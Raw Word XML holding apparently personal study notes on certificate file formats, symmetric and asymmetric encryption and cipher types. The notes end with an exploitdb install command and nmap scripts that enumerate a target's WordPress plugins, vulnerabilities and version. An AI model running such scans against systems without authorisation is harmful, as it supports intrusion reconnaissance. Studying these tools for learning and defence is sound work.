          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50E2460F" w14:textId="22F1B07F" w:rsidR="00DC0729" w:rsidRPr="005B4891" w:rsidRDefault="002C0FEC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Certificate chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC0729" w:rsidRPr="005B4891" w14:paraId="096CA5D2" w14:textId="77777777" w:rsidTr="00F71B25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B0600E6" w14:textId="09157A26" w:rsidR="00DC0729" w:rsidRPr="005B4891" w:rsidRDefault="00EE1B5C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 xml:space="preserve">File extension: </w:t>
            </w:r>
            <w:r w:rsidR="008B52A9" w:rsidRPr="005B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">.p7b </w:t>
            </w:r>
            <w:r w:rsidRPr="005B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r w:rsidR="008B52A9" w:rsidRPr="005B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> .p7c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="305D615B" w14:textId="5CE6E420" w:rsidR="00DC0729" w:rsidRPr="005B4891" w:rsidRDefault="00064E5C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 xml:space="preserve">File extension: </w:t>
            </w:r>
            <w:r w:rsidR="0039210A" w:rsidRPr="005B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>.pfx or .p12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42A85F03" w14:textId="1CCB2013" w:rsidR="00413C80" w:rsidRPr="005B4891" w:rsidRDefault="00B476F3" w:rsidP="00EB32EF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&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00413C80" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>S/MIME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EA8AD9" w14:textId="1751F617" w:rsidR="00413C80" w:rsidRPr="005B4891" w:rsidRDefault="00413C80" w:rsidP="00413C80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Sig</w:t>
      </w:r>
      <w:r w:rsidR="00F00DBE" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ned &amp; Encrypted email = .p7m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B62E2EE" w14:textId="50A9E66B" w:rsidR="00BF5DE0" w:rsidRPr="005B4891" w:rsidRDefault="00F00DBE" w:rsidP="009D58E3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Digitally signed messages = .</w:t>
      </w:r>
      <w:r w:rsidR="00703EC8" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>p7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95687" w:rsidRPr="005B4891" w14:paraId="427E49F8" w14:textId="77777777" w:rsidTr="00895687">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="050B93E1" w14:textId="77777777" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="00895687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834DC8E" w14:textId="2849F8A8" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="00D96A40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b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Other</w:t>
            </w:r>
            <w:r w:rsidRPr="005B48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B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>certificates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EFE07CF" w14:textId="77777777" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="00895687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5687" w:rsidRPr="005B4891" w14:paraId="678AEBEF" w14:textId="77777777" w:rsidTr="00895687">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01E88AA9" w14:textId="3EDCCC7B" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="00D96A40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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>PEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="511C2785" w14:textId="08EB48B2" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="00D96A40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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>DER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40250704" w14:textId="5A391322" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="00D96A40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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>PGP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00895687" w:rsidRPr="005B4891" w14:paraId="340FF987" w14:textId="77777777" w:rsidTr="00895687">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="578A149A" w14:textId="2E12818A" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="00D96A40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Human readable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67453D8C" w14:textId="54E02691" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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Binary format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66570963" w14:textId="7D185C09" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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Securing Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00895687" w:rsidRPr="005B4891" w14:paraId="7F2F0D1F" w14:textId="77777777" w:rsidTr="00895687">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63E46C5C" w14:textId="5813BBBB" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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Multiple certificates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D1DE7BA" w14:textId="6794DB69" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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Single certificate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F4FB067" w14:textId="13BBA2D1" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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Securing Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00895687" w:rsidRPr="005B4891" w14:paraId="1D628123" w14:textId="77777777" w:rsidTr="00895687">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B1756D2" w14:textId="683C0A03" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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Private keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="596A9A2B" w14:textId="7B0E80F1" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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Private keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69A94254" w14:textId="78FF58C1" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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CA Bundles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00895687" w:rsidRPr="005B4891" w14:paraId="1657802B" w14:textId="77777777" w:rsidTr="00895687">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6700CF6A" w14:textId="51A1D494" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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Certificate chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2521FC16" w14:textId="32DD6792" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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Code signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23D0A505" w14:textId="77777777" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="00895687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5687" w:rsidRPr="005B4891" w14:paraId="288FB23D" w14:textId="77777777" w:rsidTr="00895687">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51BB1B70" w14:textId="77777777" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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File extension:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AE7F301" w14:textId="77777777" w:rsidR="008F4D79" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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.crt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60CC76A5" w14:textId="77777777" w:rsidR="008F4D79" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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.pem</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AD3F4E3" w14:textId="01229C4A" w:rsidR="008F4D79" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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.key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47816787" w14:textId="77777777" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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File extension:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D715413" w14:textId="77777777" w:rsidR="008F4D79" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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.der</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50665D37" w14:textId="7C7C34D4" w:rsidR="008F4D79" w:rsidRPr="005B4891" w:rsidRDefault="008F4D79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.cer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3021" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="545BA78F" w14:textId="77777777" w:rsidR="00895687" w:rsidRPr="005B4891" w:rsidRDefault="007C00F1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File extension:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="773EA586" w14:textId="77777777" w:rsidR="007C00F1" w:rsidRPr="005B4891" w:rsidRDefault="007C00F1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.pgp = binary</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0212DC07" w14:textId="177DC8FD" w:rsidR="007C00F1" w:rsidRPr="005B4891" w:rsidRDefault="007C00F1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 xml:space="preserve">.asc = human </w:t>
            </w:r>
            <w:r w:rsidRPr="005B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>readabl</w:t>
            </w:r>
            <w:r w:rsidR="00B33812" w:rsidRPr="005B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EE26FD8" w14:textId="77777777" w:rsidR="00DE4FBA" w:rsidRPr="005B4891" w:rsidRDefault="00DE4FBA" w:rsidP="009D58E3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2FA30F94" w14:textId="0BCC27E5" w:rsidR="00DE4FBA" w:rsidRPr="005B4891" w:rsidRDefault="004F20D1" w:rsidP="00B120D1">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc198019361"/>
      <w:r w:rsidRPr="005B4891">
        <w:lastRenderedPageBreak/>
        <w:t>Symmetric and asymmetric encryption</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="757A84D0" w14:textId="6AFCD1C5" w:rsidR="004F20D1" w:rsidRPr="005B4891" w:rsidRDefault="00816250" w:rsidP="009D58E3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Plaintext =&gt; Cipher =&gt; Plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D4AB26" w14:textId="068808D6" w:rsidR="00D85C20" w:rsidRPr="005B4891" w:rsidRDefault="00D85C20" w:rsidP="009D58E3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AES = Advanced Encryption Standard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E48378" w14:textId="2007E4EA" w:rsidR="004F20D1" w:rsidRPr="005B4891" w:rsidRDefault="004F20D1" w:rsidP="009D58E3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Symmetric encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D5D35F" w14:textId="445DFA43" w:rsidR="00872EC3" w:rsidRPr="005B4891" w:rsidRDefault="00872EC3" w:rsidP="00595833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Fastest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5400976A" w14:textId="1DA234F1" w:rsidR="00595833" w:rsidRPr="005B4891" w:rsidRDefault="00595833" w:rsidP="00595833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Single key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322AE75D" w14:textId="18F4CCAF" w:rsidR="00012FA9" w:rsidRPr="005B4891" w:rsidRDefault="00E07AB7" w:rsidP="00012FA9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 xml:space="preserve">Mathematical operation that converts plaintext into </w:t>
      </w:r>
      <w:r w:rsidR="00DE339C" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ciphertext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CDECF7" w14:textId="4C47F86C" w:rsidR="00012FA9" w:rsidRPr="005B4891" w:rsidRDefault="00012FA9" w:rsidP="00012FA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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="284442AA" wp14:editId="526EB8C7">
            <wp:extent cx="4146332" cy="1972615"/>
            <wp:effectExtent l="0" t="0" r="6985" b="8890"/>
            <wp:docPr id="2010860710" name="Bilde 1" descr="Et bilde som inneholder tekst, diagram, design, skjermbild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60710" name="Bilde 1" descr="Et bilde som inneholder tekst, diagram, design, skjermbilde&#10;&#10;KI-generert innhold kan være feil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492" cy="19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2991" w14:textId="58E2A113" w:rsidR="004F20D1" w:rsidRPr="005B4891" w:rsidRDefault="004F20D1" w:rsidP="009D58E3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Asymmetric encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A320598" w14:textId="3FA99776" w:rsidR="00084E3D" w:rsidRPr="005B4891" w:rsidRDefault="00084E3D" w:rsidP="00012FA9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More secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3D606E" w14:textId="709834E4" w:rsidR="00736DE6" w:rsidRPr="005B4891" w:rsidRDefault="00736DE6" w:rsidP="00012FA9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Two keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E9C375" w14:textId="59727094" w:rsidR="008804F0" w:rsidRPr="005B4891" w:rsidRDefault="008804F0" w:rsidP="00012FA9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Public key distributed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9CF411" w14:textId="56B4BA3F" w:rsidR="008804F0" w:rsidRPr="005B4891" w:rsidRDefault="008804F0" w:rsidP="00012FA9">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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 xml:space="preserve">Private key </w:t>
      </w:r>
      <w:r w:rsidR="000F36F4" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>decrypts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6366D2D1" w14:textId="0FBD9FC7" w:rsidR="000F36F4" w:rsidRPr="005B4891" w:rsidRDefault="00D5401B" w:rsidP="00D5401B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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78A758F3" wp14:editId="1EBF7F21">
            <wp:extent cx="4004442" cy="1833604"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1783554508" name="Bilde 1" descr="Et bilde som inneholder tekst, diagram, skjermbilde, Fon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54508" name="Bilde 1" descr="Et bilde som inneholder tekst, diagram, skjermbilde, Font&#10;&#10;KI-generert innhold kan være feil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9625" cy="18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33A3" w14:textId="77777777" w:rsidR="00AF1074" w:rsidRPr="005B4891" w:rsidRDefault="00AF1074" w:rsidP="00D5401B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71810C57" w14:textId="77777777" w:rsidR="00AF1074" w:rsidRPr="005B4891" w:rsidRDefault="00AF1074" w:rsidP="00D5401B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247C9D8B" w14:textId="77777777" w:rsidR="00AF1074" w:rsidRDefault="00AF1074" w:rsidP="00D5401B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7CAB6DA5" w14:textId="77777777" w:rsidR="00A05553" w:rsidRPr="005B4891" w:rsidRDefault="00A05553" w:rsidP="00D5401B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610F" w:rsidRPr="005B4891" w14:paraId="7B3C9DC1" w14:textId="77777777" w:rsidTr="0057610F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="035EBD9F" w14:textId="00C027B1" w:rsidR="0057610F" w:rsidRPr="005B4891" w:rsidRDefault="0057610F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89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Block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="649D2260" w14:textId="35E1D775" w:rsidR="0057610F" w:rsidRPr="005B4891" w:rsidRDefault="0057610F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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00981E6D" w:rsidRPr="005B4891" w14:paraId="16F5983D" w14:textId="77777777" w:rsidTr="0057610F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F7CEFFE" w14:textId="239CF6DC" w:rsidR="00981E6D" w:rsidRPr="005B4891" w:rsidRDefault="00981E6D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AES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="75AD9D8E" w14:textId="77777777" w:rsidR="00981E6D" w:rsidRPr="005B4891" w:rsidRDefault="00981E6D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Salsa20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="570FDF47" w14:textId="22DC786E" w:rsidR="00981E6D" w:rsidRPr="005B4891" w:rsidRDefault="00463DEE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 xml:space="preserve">Stronger version = </w:t>
            </w:r>
            <w:r w:rsidR="00981E6D" w:rsidRPr="005B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Chacha20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00981E6D" w:rsidRPr="005B4891" w14:paraId="41E3FEA3" w14:textId="77777777" w:rsidTr="0057610F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66DE0FC9" w14:textId="5E989D3F" w:rsidR="00981E6D" w:rsidRPr="005B4891" w:rsidRDefault="00981E6D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Twofish</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="701071A0" w14:textId="77777777" w:rsidR="00981E6D" w:rsidRPr="005B4891" w:rsidRDefault="00981E6D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610F" w:rsidRPr="005B4891" w14:paraId="0BDACD91" w14:textId="77777777" w:rsidTr="0057610F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2992D164" w14:textId="7868F07E" w:rsidR="0057610F" w:rsidRPr="005B4891" w:rsidRDefault="00230560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RC5/RC6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0077B802" w14:textId="04EF5D9B" w:rsidR="0057610F" w:rsidRPr="005B4891" w:rsidRDefault="00230560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Rabbit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00230560" w:rsidRPr="005B4891" w14:paraId="29B6637C" w14:textId="77777777" w:rsidTr="0057610F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AC4D659" w14:textId="1FB8AEFD" w:rsidR="00230560" w:rsidRPr="005B4891" w:rsidRDefault="00230560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CAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C5FFE95" w14:textId="4EDA69A7" w:rsidR="00633FFA" w:rsidRPr="005B4891" w:rsidRDefault="00230560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Scream</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00633FFA" w:rsidRPr="005B4891" w14:paraId="692848B2" w14:textId="77777777" w:rsidTr="0057610F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="656FA33E" w14:textId="3F2AA183" w:rsidR="00633FFA" w:rsidRPr="005B4891" w:rsidRDefault="00CE07C2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DES/3DES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06D65FDD" w14:textId="3797D3D2" w:rsidR="00977957" w:rsidRPr="005B4891" w:rsidRDefault="00CE07C2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RC4</w:t>
            </w:r>
            <w:r w:rsidR="00977957" w:rsidRPr="005B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> (deprecated)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CE07C2" w:rsidRPr="005B4891" w14:paraId="2DF09623" w14:textId="77777777" w:rsidTr="0057610F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57DFA63D" w14:textId="1D3089BA" w:rsidR="00CE07C2" w:rsidRPr="005B4891" w:rsidRDefault="00CE07C2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Blo</w:t>
            </w:r>
            <w:r w:rsidR="00335140" w:rsidRPr="005B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>w</w:t>
            </w:r>
            <w:r w:rsidRPr="005B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>fish</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39F959A3" w14:textId="77777777" w:rsidR="00CE07C2" w:rsidRPr="005B4891" w:rsidRDefault="00CE07C2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B3A19BD" w14:textId="092CB1C1" w:rsidR="00131E14" w:rsidRPr="005B4891" w:rsidRDefault="00131E14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Sudo apt install exploitdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183E34FB" w14:textId="2BD589C3" w:rsidR="0010204D" w:rsidRPr="005B4891" w:rsidRDefault="00AB27F8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Wordpress plugins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCC412C" w14:textId="57BD3611" w:rsidR="00AB27F8" w:rsidRPr="005B4891" w:rsidRDefault="00AB27F8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nmap --script http-wordpress-plugins --script-args http-wordpress-plugins.search=/wp-content/plugins/ &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190B489F" w14:textId="77777777" w:rsidR="004024C3" w:rsidRPr="005B4891" w:rsidRDefault="004024C3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1B0C35F4" w14:textId="2FA568F6" w:rsidR="004024C3" w:rsidRPr="005B4891" w:rsidRDefault="004024C3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Wordpress vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="00C130E3" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4990AE58" w14:textId="7FA5DC8F" w:rsidR="004024C3" w:rsidRPr="005B4891" w:rsidRDefault="004024C3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nmap -p 80,443 --script http-vuln* &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D31584" w14:textId="213C2D53" w:rsidR="00C130E3" w:rsidRPr="005B4891" w:rsidRDefault="00C130E3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 xml:space="preserve">wordpress </w:t>
      </w:r>
      <w:r w:rsidR="007B1649" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D987C1D" w14:textId="10D2F722" w:rsidR="00C130E3" w:rsidRPr="005B4891" w:rsidRDefault="00C130E3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nmap -p 80,443 --script http-wordpress-version &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D88FAD" w14:textId="77777777" w:rsidR="007B1649" w:rsidRPr="005B4891" w:rsidRDefault="007B1649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52403625" w14:textId="30086D5D" w:rsidR="00C130E3" w:rsidRPr="005B4891" w:rsidRDefault="007B1649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Wordpress login:</w:t>
      </w:r>
    </w:p>
